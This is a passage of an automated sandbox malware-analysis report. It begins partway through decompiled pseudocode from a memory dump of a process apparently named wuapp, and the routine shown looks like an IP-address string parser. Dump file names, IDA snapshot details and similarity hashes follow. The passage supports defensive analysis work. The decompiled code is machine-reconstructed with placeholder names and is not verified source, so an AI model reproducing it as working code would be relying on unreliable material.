                                                        						_t127 = 1;
                                                        						goto L36;
                                                        					}
                                                        					if(_t167 >= 0x80) {
                                                        						L7:
                                                        						if(_t167 == 0x3a) {
                                                        							_t158 = 0;
                                                        							if(_v12 > 0 || _v8 > 6) {
                                                        								break;
                                                        							} else {
                                                        								_t119 =  &(_t164[1]);
                                                        								if( *_t119 != _t167) {
                                                        									_v8 = _v8 + 1;
                                                        									L13:
                                                        									_v20 = _t158;
                                                        									goto L14;
                                                        								}
                                                        								if(_v28 != 0) {
                                                        									break;
                                                        								}
                                                        								_v28 = _v8 + 1;
                                                        								_t143 = 2;
                                                        								_v8 = _v8 + _t143;
                                                        								goto L47;
                                                        							}
                                                        						}
                                                        						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                        							break;
                                                        						} else {
                                                        							_v12 = _v12 + 1;
                                                        							_t158 = 0;
                                                        							goto L13;
                                                        						}
                                                        					}
                                                        					if(E01ED685D(_t167, 4) != 0) {
                                                        						_v16 = _v16 + 1;
                                                        						goto L19;
                                                        					}
                                                        					if(E01ED685D(_t167, 0x80) != 0) {
                                                        						_v16 = _v16 + 1;
                                                        						if(_v12 > 0) {
                                                        							break;
                                                        						}
                                                        						_a7 = 1;
                                                        						goto L19;
                                                        					}
                                                        					goto L7;
                                                        				}
                                                        				 *_a8 = _t164;
                                                        				if(_v12 != 0) {
                                                        					if(_v12 != 3) {
                                                        						goto L29;
                                                        					}
                                                        					_v8 = _v8 + 1;
                                                        				}
                                                        				if(_v28 != 0 || _v8 == 7) {
                                                        					if(_v20 != 1) {
                                                        						if(_v20 != 2) {
                                                        							goto L29;
                                                        						}
                                                        						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                        						L65:
                                                        						_t105 = _v28;
                                                        						if(_t105 != 0) {
                                                        							_t98 = (_t105 - _v8) * 2; // 0x11
                                                        							E01EB8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                        							_t110 = 8;
                                                        							E01EADFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                        						}
                                                        						return 0;
                                                        					}
                                                        					if(_v12 != 0) {
                                                        						if(_v16 > 3) {
                                                        							goto L29;
                                                        						}
                                                        						_t114 = E01EDEE02(_v24, 0, 0xa);
                                                        						_t170 = _t170 + 0xc;
                                                        						if(_t114 > 0xff) {
                                                        							goto L29;
                                                        						}
                                                        						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                        						goto L65;
                                                        					}
                                                        					if(_v16 > 4) {
                                                        						goto L29;
                                                        					}
                                                        					_t115 = E01EDEE02(_v24, 0, 0x10);
                                                        					_t170 = _t170 + 0xc;
                                                        					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                        					goto L65;
                                                        				} else {
                                                        					goto L29;
                                                        				}
                                                        			}
                                                        0x01f0ed30
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0ed3c
                                                        0x01f0ed43
                                                        0x01f0ed4b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

APIs
Memory Dump Source
• Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
• Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
Similarity
• API ID: __fassign
• String ID:
• API String ID: 3965848254-0
• Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction ID: c294a4bacacf51e8591c572116c02507e814fb6c1269c138f84eac22a5cabaf9
• Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction Fuzzy Hash: E091B231D0024AEEDF25CF58C8457EEBBB4FF45318F24946AE912A7292E7314A43DB91
Uniqueness

Uniqueness Score: -1.00%